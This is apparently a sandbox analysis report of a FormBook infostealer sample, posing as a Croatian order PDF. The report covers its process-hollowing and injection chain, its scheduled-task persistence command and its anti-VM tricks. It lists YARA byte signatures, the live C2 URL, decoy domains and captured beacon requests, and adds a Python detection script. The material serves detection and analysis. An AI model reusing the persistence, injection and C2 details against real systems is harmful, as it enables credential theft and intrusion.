

Analysis Report: nova narud#U017eba pdf rvP6N.exe (the name is Croatian, "nova narudžba" = "new order", consistent with the geo:HRV tag below; #U017e is the escaped form of ž, U+017E)

Overview

General Information

Sample Name: nova narud#U017eba pdf rvP6N.exe
Analysis ID: 383924
MD5: 35076f942b11f79d1156069e55ab132d
SHA1: edad117505f1a87b7512a6c85cac30d691d2ff0a
SHA256: 56e676fae09b69a9eae221e0590776815f7fa38e7cc90822cd3060ea289d7547
Tags: exe, Formbook, geo:HRV

Detection: FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • nova narud#U017eba pdf rvP6N.exe (PID: 4844 cmdline: 'C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe' MD5: 35076F942B11F79D1156069E55AB132D)
    • schtasks.exe (PID: 6252 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6300 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 1516 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
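The chain above, read as detection logic. The following is an added example (not part of the Joe Sandbox report) that encodes four of the behaviours the report attributes to this sample as rules over process-creation events: the schtasks /Create /XML from the user's Temp directory that fired the Sigma rule further down, a .NET framework utility (RegSvcs.exe) started with an empty command line by a process outside C:\Windows (the hollowing host), explorer.exe spawning netsh.exe, and cmd.exe deleting the .NET binary that hosted the injected stage. The events are constructed from the PIDs, image paths and command lines in the tree; the parent PID of the sample, the image paths of cmd.exe and explorer.exe, and the extra utility names in DOTNET_HOSTS are assumptions. The Sigma event further down reports Image as C:\Windows\SysWOW64\schtasks.exe although the command line names System32 (the 32-bit parent is subject to file-system redirection), so the rules match on the basename rather than the full path.

```python
"""Detection rules for the process chain in the Startup tree above.

Added example, not part of the Joe Sandbox report. EVENTS is constructed
from the report's process tree; it is not captured EDR telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str   # command line as logged (cmd.exe's omits the image, as in the report)


# The Temp directory the schtasks /XML file was read from (Sigma rule on the page)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# .NET framework utilities used as hollowing hosts. RegSvcs.exe is the one in this
# report; the other names are an assumption drawn from similar loaders.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
DEL_TARGET_RE = re.compile(r"""\bdel\s+['"]?([^'"]+)""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(ev: ProcEvent) -> bool:
    """True when the command line is nothing but the image path (RegSvcs.exe here)."""
    return ev.cmdline.strip().strip("'\"").lower() == ev.image.lower()


def detect(events):
    """Return (rule_name, pid) for every event that matches one of four rules."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        name = basename(ev.image)
        parent_name = basename(parent.image) if parent else ""
        parent_in_windows = bool(parent) and parent.image.lower().startswith("c:\\windows\\")
        cmd = ev.cmdline.lower()

        # 1. Scheduled task registered from an XML file in the user's Temp directory
        if name == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and TEMP_DIR_RE.search(ev.cmdline):
            hits.append(("schtasks_xml_from_temp", ev.pid))

        # 2. .NET utility with an empty command line, started by a process outside C:\Windows:
        #    an empty host launched only to receive injected code
        if name in DOTNET_HOSTS and parent and not parent_in_windows and has_no_arguments(ev):
            hits.append(("dotnet_utility_hollowing_host", ev.pid))

        # 3. explorer.exe spawning netsh.exe: the injected explorer stage starting the next host
        if name == "netsh.exe" and parent_name == "explorer.exe":
            hits.append(("explorer_spawns_netsh", ev.pid))

        # 4. cmd.exe deleting a .NET framework binary: cleanup of the hollowed host
        m = DEL_TARGET_RE.search(ev.cmdline)
        if name == "cmd.exe" and m and "\\microsoft.net\\framework" in m.group(1).lower():
            hits.append(("cmd_deletes_dotnet_binary", ev.pid))
    return hits


SAMPLE = r"C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed from the Startup tree; PIDs, images and command lines as reported there.
EVENTS = [
    ProcEvent(4844, 0, SAMPLE, f"'{SAMPLE}'"),                       # parent not in the report (assumed 0)
    ProcEvent(6252, 4844, r"C:\Windows\SysWOW64\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp'"),
    ProcEvent(6264, 6252, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6300, 4844, REGSVCS, REGSVCS),
    ProcEvent(3292, 6300, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),  # drawn under RegSvcs.exe by the sandbox because of injection; path assumed
    ProcEvent(7088, 3292, r"C:\Windows\SysWOW64\netsh.exe", r"C:\Windows\SysWOW64\netsh.exe"),
    ProcEvent(1516, 7088, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{REGSVCS}'"),    # image path assumed
    ProcEvent(5484, 1516, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 2 is the one worth tuning in production: RegSvcs.exe launched with no arguments by something under C:\Users is rare on a workstation, but the same check applied to MSBuild.exe will fire on build hosts, so scope the parent-path condition to what your estate actually runs.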

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}

Yara Overview

Memory Dumps

Memory dump / matched rule / description / author / matched strings

00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp
  • JoeSecurity_FormBook: Yara detected FormBook (Joe Security)
  • Formbook_1: autogenerated rule brought to you by yara-signator (Felix Bilstein - yara-signator at cocacoding dot com)
      0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Formbook: detect Formbook in memory (JPCERT/CC Incident Response Group)
      0x18429:$sqlite3step: 68 34 1C 7B E1
      0x1853c:$sqlite3step: 68 34 1C 7B E1
      0x18458:$sqlite3text: 68 38 2A 90 C5
      0x1857d:$sqlite3text: 68 38 2A 90 C5
      0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      0x18593:$sqlite3blob: 68 53 D8 7F 8C

0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp
  • JoeSecurity_FormBook: Yara detected FormBook (Joe Security)
  • Formbook_1: autogenerated rule brought to you by yara-signator (Felix Bilstein - yara-signator at cocacoding dot com); the same ten $sequence_* strings at the same offsets as in the dump above

(18 further entries not shown)

Reading the strings: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) decodes to add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax, the timestamp-counter delta behind the "Tries to detect virtualization through RDTSC time measurements" signature above. The three JPCERT strings are push imm32 instructions (opcode 68) of the constants 0xE17B1C34, 0xC5902A38 and 0x8C7FD853; as the string names indicate, these are the hashed identifiers under which FormBook resolves sqlite3_step, sqlite3_column_text and sqlite3_column_blob for reading browser databases.

Unpacked PEs

Unpacked PE / matched rule / description / author / matched strings

3.2.RegSvcs.exe.400000.0.unpack
  • JoeSecurity_FormBook: Yara detected FormBook (Joe Security)
  • Formbook_1: autogenerated rule brought to you by yara-signator (Felix Bilstein - yara-signator at cocacoding dot com)
      0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
      0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Formbook: detect Formbook in memory (JPCERT/CC Incident Response Group)
      0x17629:$sqlite3step: 68 34 1C 7B E1
      0x1773c:$sqlite3step: 68 34 1C 7B E1
      0x17658:$sqlite3text: 68 38 2A 90 C5
      0x1777d:$sqlite3text: 68 38 2A 90 C5
      0x1766b:$sqlite3blob: 68 53 D8 7F 8C
      0x17793:$sqlite3blob: 68 53 D8 7F 8C

3.2.RegSvcs.exe.400000.0.raw.unpack
  • JoeSecurity_FormBook: Yara detected FormBook (Joe Security)
  • Formbook_1: autogenerated rule brought to you by yara-signator (Felix Bilstein - yara-signator at cocacoding dot com)
      0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(1 further entry not shown)

Every string sits exactly 0xE00 bytes lower in 3.2.RegSvcs.exe.400000.0.unpack than in the .raw.unpack image, a constant shift between the two layouts; the byte sequences are identical, so rules written from either artifact match both, and offsets should not be baked into a rule.

          Sigma Overview

          System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started; Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe'
  ParentImage: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe
  ParentProcessId: 4844
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp'
  ProcessId: 6252

          Signature Overview


          AV Detection:

Antivirus detection for URL or domain
Source: www.lovetarot.online/sqxs/; Avira URL Cloud: Label: malware

Found malware configuration
Source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook, with the C2 list and decoy list reproduced in full under Malware Configuration above

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\kPDOHsyqKitj.exe; ReversingLabs: Detection: 14%

Multi AV Scanner detection for submitted file
Source: nova narud#U017eba pdf rvP6N.exe; Virustotal: Detection: 22%
Source: nova narud#U017eba pdf rvP6N.exe; ReversingLabs: Detection: 14%

Yara detected FormBook
Source: Yara match; File source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\kPDOHsyqKitj.exe; Joe Sandbox ML: detected

Machine Learning detection for sample
Source: nova narud#U017eba pdf rvP6N.exe; Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
Source: 3.2.RegSvcs.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Static PE information and debug-symbol strings
Source: nova narud#U017eba pdf rvP6N.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: nova narud#U017eba pdf rvP6N.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netsh.pdb; source: RegSvcs.exe, 00000003.00000002.292530659.0000000000D81000.00000004.00000020.sdmp
Source: Binary string: RegSvcs.pdb,; source: netsh.exe, 0000000F.00000002.503721845.0000000003ABF000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: RegSvcs.exe, 00000003.00000002.292653801.00000000011A0000.00000040.00000001.sdmp, netsh.exe, 0000000F.00000002.501734799.0000000003590000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL; source: RegSvcs.exe, 00000003.00000002.292530659.0000000000D81000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb; source: RegSvcs.exe, netsh.exe
Source: Binary string: RegSvcs.pdb; source: netsh.exe, 0000000F.00000002.503721845.0000000003ABF000.00000004.00000001.sdmp
(netsh.pdb turning up in RegSvcs.exe's memory and RegSvcs.pdb in netsh.exe's is consistent with the injection chain in the Startup tree: each process carries a copy of the other's image.)

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_02A5A3A8
Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_02A5A398
Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_02A5A45C
Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_02A5B8BB
Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_02A5B8C8

          Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.lovetarot.online/sqxs/
Source: global traffic; HTTP traffic detected: GET /sqxs/?9r=MRpl8UDFdJqnpJCoHCjX+0bMpbzGGukG+UMXxre6C1KfRpZnCXnM0uJ6ixOsqKWJKMs9S6HgiQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1 / Host: www.magentos6.com / Connection: close / Data Raw: 00 00 00 00 00 00 00 / Data Ascii: (non-printable)
Source: global traffic; HTTP traffic detected: GET /sqxs/?9r=vISvmTlEiopKSz7sbFBAxkFCF8r7k2dJAG7u5uLq0h9VZPMRNv+QYXnwEIKYsgNdKjl1RWh6mQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1 / Host: www.businesshouse5asidejm.com / Connection: close / Data Raw: 00 00 00 00 00 00 00 / Data Ascii: (non-printable)
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: unknown; DNS traffic detected: queries for: www.magentos6.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found / Date: Thu, 08 Apr 2021 10:34:41 GMT / Server: Apache/2.4.29 (Ubuntu) / Content-Length: 328 / Connection: close / Content-Type: text/html; charset=utf-8 / Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqxs/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Strings found in binary or memory (URL; source):
• http://fontfabrik.com; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.247095559.0000000002C11000.00000004.00000001.sdmp
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.247192769.0000000002C60000.00000004.00000001.sdmp
• http://www.apache.org/licenses/LICENSE-2.0; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.autoitscript.com/autoit3/J; explorer.exe, 00000004.00000000.269916835.0000000006870000.00000004.00000001.sdmp
• http://www.carterandcone.comadi; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.carterandcone.comefa; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.carterandcone.coml; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.carterandcone.comva; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.234005594.0000000005C54000.00000004.00000001.sdmp
• http://www.fontbureau.com; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designers; explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designers/?; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designers/cabarga.htmlN; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designers/frere-jones.html; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designers8; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designers?; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com/designersG; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.fontbureau.com=; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp
• http://www.fontbureau.comE.TTF; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp
• http://www.fontbureau.comF; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp
• http://www.fontbureau.comFt; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp
• http://www.fontbureau.comrsivr; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp
• http://www.fonts.com; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.founder.com.cn/cn; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.founder.com.cn/cn/bThe; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.founder.com.cn/cn/cThe; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.founder.com.cn/cn/tm; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.233746796.0000000005C51000.00000004.00000001.sdmp
• http://www.galapagosdesign.com/DPlease; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.galapagosdesign.com/staff/dennis.htm; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.goodfont.co.kr; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.jiyu-kobo.co.jp/; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp, nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235359346.0000000005C4A000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.jiyu-kobo.co.jp/5; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/Ian; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/S; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/Sue; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.234872250.0000000005C46000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/Y0; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/Y0bd; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/Y0y; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235359346.0000000005C4A000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/j; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/jp/; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/jp/S; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235198791.0000000005C4A000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/roso; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/s_tr; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp
• http://www.jiyu-kobo.co.jp/vv; nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.234872250.0000000005C46000.00000004.00000001.sdmp
